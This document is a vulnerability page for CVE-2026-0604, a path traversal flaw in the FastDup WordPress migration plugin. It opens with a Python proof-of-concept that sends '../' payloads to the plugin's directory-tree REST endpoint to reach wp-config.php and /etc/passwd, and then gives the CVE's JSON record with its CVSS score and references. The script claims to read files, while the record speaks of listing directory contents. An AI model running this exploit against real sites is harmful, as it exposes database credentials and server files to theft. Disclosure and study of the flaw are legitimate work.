CVE-2026-0604

import requests import sys # CVE-2026-0604 PoC - FastDup Path Traversal # Authenticated attackers with Contributor+ access can read arbitrary directories TARGET_URL = "http://target-wordpress-site.com" API_ENDPOINT = "/wp-json/njt-fastdup/v1/template/directory-tree" # Authentication cookies (Contributor level or higher) COOKIES = { "wordpress_logged_in_": "your-auth-cookie-here" } def read_directory(dir_path): """Read arbitrary directory contents via path traversal""" url = f"{TARGET_URL}{API_ENDPOINT}" headers = { "Content-Type": "application/json", "X-WP-Nonce": "your-wp-nonce-here" } # Payload: Path traversal to read wp-config.php payload = { "dir_path": dir_path } try: response = requests.post(url, json=payload, cookies=COOKIES, headers=headers, timeout=10) if response.status_code == 200: return response.json() else: return {"error": f"HTTP {response.status_code}"} except requests.RequestException as e: return {"error": str(e)} if __name__ == "__main__": # Example: Read WordPress config file target_path = "../../../wp-config.php" print(f"[*] Attempting to read: {target_path}") result = read_directory(target_path) print(f"[+] Result: {result}") # Example: Read /etc/passwd target_path = "../../../../etc/passwd" print(f"[*] Attempting to read: {target_path}") result = read_directory(target_path) print(f"[+] Result: {result}")

{"cve": {"id": "CVE-2026-0604", "sourceIdentifier": "[email protected]", "published": "2026-01-06T04:15:53.633", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The FastDup – Fastest WordPress Migration & Duplicator plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 2.7 via the 'dir_path' parameter in the 'njt-fastdup/v1/template/directory-tree' REST API endpoint. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the contents of arbitrary directories on the server, which can contain sensitive information."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/fastdup/tags/2.7/includes/Endpoint/TemplateApi.php#L219", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/fastdup/trunk/includes/Endpoint/TemplateApi.php#L219", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3432226%40fastdup&new=3432226%40fastdup&sfp_email=&sfph_mail=#file3", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ac97c729-4c75-429b-bbf2-27ca322be1cf?source=cve", "source": "[email protected]"}]}}